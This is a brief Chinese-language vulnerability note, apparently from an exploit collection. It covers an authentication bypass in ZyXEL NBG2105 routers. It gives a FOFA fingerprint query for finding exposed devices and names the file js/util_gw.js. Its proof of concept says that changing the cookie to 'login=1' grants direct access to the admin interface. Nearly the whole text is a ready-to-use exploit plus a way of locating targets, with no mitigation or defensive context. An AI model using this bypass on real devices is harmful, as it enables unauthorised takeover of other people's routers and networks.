FOFA:
app="ZyXEL-NBG2105"
漏洞代码:
http://target/js/util_gw.js
PoC:
Cookie: login=1; 只需要将cookie中login=0 修改为login=1即可直接进入管理界面。
ref: